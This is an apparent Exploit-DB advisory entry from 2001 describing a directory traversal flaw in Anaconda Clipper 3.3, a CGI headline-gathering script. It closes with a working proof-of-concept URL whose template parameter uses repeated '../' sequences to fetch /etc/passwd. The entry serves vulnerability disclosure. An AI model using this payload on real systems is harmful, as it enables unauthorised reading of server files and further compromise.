anaconda clipper 3.3 - Directory Traversal

EDB-ID:

20714




Platform:

CGI

Date:

2001-03-27


source: https://www.securityfocus.com/bid/2512/info

Clipper is a headline-gathering tool from Anaconda! Partners which, in certain versions, is vulnerable to directory traversal attacks.

By including '/../' sequences in requested URLs, an attacker can cause the retrieval of arbitrary files, compromising the privacy of user data and potentially obtaining information which could be used to further compromise the host's security. 

http://www.target.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd